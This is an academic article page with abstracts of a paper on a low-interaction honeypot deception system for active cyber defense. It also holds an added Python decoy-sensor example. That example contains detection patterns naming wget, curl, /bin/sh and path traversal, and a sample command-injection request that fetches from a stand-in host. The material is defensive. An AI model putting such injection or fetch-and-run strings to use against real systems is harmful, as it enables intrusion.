Design of a cooperative and independent deception system within an active cyber defense system

Article type: Research article

Authors

1 Assistant Professor, Malik Ashtar University of Technology, Tehran, Iran

2 Master's student, Malik Ashtar University of Technology, Tehran, Iran

Abstract

Cyber deception technology is part of the process of detecting and responding to cyber incidents. It steers attackers toward fake IT assets so that advanced threats can be detected and analyzed. Alerts generated by a deception system have high fidelity. Deception can be carried out in several ways, one of which is the active defense approach. Active cyber defense comprises the set of measures that guide us toward cyber security: the detection, analysis, identification and mitigation of threats to systems and communication networks in real time. One active-defense tool is the honeypot. A honeypot is a decoy deliberately placed in the network to be probed by an attacker, so that the attacker's activity can be recorded, tracked and analyzed. This research addresses the low-interaction variety, which is used to identify malicious activity. Using the available tools and strategies, an active cyber defense system (cyber SDF) has been designed to monitor anomalies in real time as they occur. SDF can differentiate the functional level of attackers according to their IP address. Work on cyber deception and honeypots focuses on trapping the attacker through misdirection, confusion and similar means. In fact, the technology used in SDF is an evolved form of the honeypot, in that it extends the honeypot's limited capabilities.

Keywords


Article title [English]

A cooperative and independent deception system in the active cyber defense system

Authors [English]

  • Kourosh Dadashtabar Ahmadi 1
  • Mohammad Mahmoudbabouei 2
1 Assistant Professor, Malik Ashtar University of Technology, Tehran, Iran
2 Master's student, Malik Ashtar University of Technology, Tehran, Iran
Abstract [English]

Cyber deception technology is part of the process of identifying and responding to incidents. It helps the security team identify and analyze advanced threats by luring an attacker into striking fake resources. The deception approach produces high-precision warnings about high-risk behavior. Deception occurs in a variety of ways, one of which is the active defense approach. Active defense is based on establishing measures to detect, analyze, identify and reduce threats to communication systems and networks in real time, which ultimately leads to cyber security. A well-known active-defense technique is the honeypot: a decoy deliberately placed on the network to be explored by an attacker so that the activities performed can be recorded, tracked and analyzed. In this project, we have used a low-interaction honeypot to identify malicious activities. Using these technologies and strategies, we have designed an active cyber defense system (SDF). Keyed on the source IP, the system monitors and detects in real time the abnormalities that occur and expresses them as the functional level of the attacker. Both cyber deception and the honeypot concentrate on trapping the attacker by misleading, confusing, and so on, but active cyber deception (SDF) technology is an evolution of the honeypot that extends its limited capabilities.
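Both abstracts describe the same mechanism at a high level: a low-interaction decoy that records every contact, treats each contact as a high-fidelity alert (no legitimate client has any reason to talk to a decoy), and differentiates attackers by source IP into "functional levels". The following is an added illustration of that idea, written for this page; it is not the paper's SDF code, and the level names, the classification rules, the scan threshold, the decoy banner and the sample events are all constructed assumptions.

```python
"""Minimal low-interaction decoy sensor with per-source-IP "functional level"
scoring. Constructed illustration; LEVELS, _RULES, thresholds and sample data
are assumptions, not the scheme used by the paper's SDF system."""
import re
import socketserver
import threading
from collections import defaultdict
from dataclasses import dataclass, field

# Ordered attacker levels (constructed); list index is severity order.
LEVELS = ["probe", "enumeration", "credential_attack", "exploitation"]

# Heuristics over the first bytes a client sends to the decoy, most severe
# first (constructed; a production sensor would use protocol-aware parsers).
_RULES = [
    ("exploitation", re.compile(rb"(wget|curl|/bin/sh|chmod\s+\+x|\.\./\.\./|%2e%2e)", re.I)),
    ("credential_attack", re.compile(rb"(^USER\s|^PASS\s|login|password|Authorization:)", re.I | re.M)),
    ("enumeration", re.compile(rb"(^GET\s|^HEAD\s|^OPTIONS\s|^SSH-|^HELP|^EHLO|^HELO)", re.I | re.M)),
]


def classify(payload: bytes) -> str:
    """Map what a client sent to one of LEVELS. A connect-and-close with no
    data is a bare probe; any other unrecognised input counts as enumeration."""
    if not payload.strip():
        return "probe"
    for level, rx in _RULES:
        if rx.search(payload):
            return level
    return "enumeration"


@dataclass
class SourceProfile:
    events: int = 0
    ports: set = field(default_factory=set)
    max_level: int = 0  # index into LEVELS


class DeceptionTracker:
    """Per-source-IP state. Every decoy contact yields an alert; the level and
    the scan flag are what differentiate one attacker from another."""

    def __init__(self, scan_port_threshold: int = 3):
        self.profiles = defaultdict(SourceProfile)
        self.scan_port_threshold = scan_port_threshold
        self.alerts = []

    def record(self, src_ip: str, dst_port: int, payload: bytes) -> dict:
        level = classify(payload)
        prof = self.profiles[src_ip]
        prof.events += 1
        prof.ports.add(dst_port)
        prof.max_level = max(prof.max_level, LEVELS.index(level))
        alert = {
            "src_ip": src_ip,
            "dst_port": dst_port,
            "level": level,                          # this event
            "source_level": LEVELS[prof.max_level],  # worst seen from this IP
            "scan": len(prof.ports) >= self.scan_port_threshold,
        }
        self.alerts.append(alert)
        return alert

    def level_of(self, src_ip: str) -> str:
        return LEVELS[self.profiles[src_ip].max_level]


class DecoyHandler(socketserver.BaseRequestHandler):
    """Fake service: send a banner, read one request, record it, hang up."""

    def handle(self):
        self.request.sendall(self.server.banner)
        self.request.settimeout(2.0)
        try:
            data = self.request.recv(1024)
        except OSError:  # timeout or reset: treat as a bare probe
            data = b""
        self.server.tracker.record(self.client_address[0],
                                   self.server.server_address[1], data)


class DecoyServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, addr, tracker, banner=b"220 decoy-ftp ready\r\n"):
        super().__init__(addr, DecoyHandler)
        self.tracker = tracker
        self.banner = banner


def start_decoy(tracker, host="127.0.0.1", port=0) -> DecoyServer:
    """Run a decoy on a background thread; port 0 lets the OS pick a free port."""
    srv = DecoyServer((host, port), tracker)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    # Constructed sample events from one source (203.0.113.7 is a documentation address).
    t = DeceptionTracker()
    for port, data in [(22, b""), (21, b"USER admin\r\nPASS admin123\r\n"),
                       (80, b"GET /cgi-bin/x?c=wget%20http://example.invalid/a HTTP/1.1\r\n")]:
        print(t.record("203.0.113.7", port, data))
    print("source level:", t.level_of("203.0.113.7"))
```

The design point is that the decoy itself does no detection in the IDS sense: contact is the signal, which is why the abstract can claim high-fidelity alerts. The tracker only adds the per-IP differentiation, so a source that merely connected (probe) is reported differently from one that submitted credentials or a command string, and a source touching several decoy ports is flagged as scanning. Run the module directly to see the constructed events scored; `start_decoy` is there for an actual loopback deployment.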

Keywords [English]

  • Honeypot
  • cyber deception
  • active cyber defense
  • low interaction


Volume 10, Issue 2 - Serial Number 38
Serial Number 38, Summer issue
Mehr 1401
Pages 129-142
  • Received: 01 Shahrivar 1400
  • Revised: 19 Mehr 1400
  • Accepted: 27 Azar 1400
  • Published: 01 Mehr 1401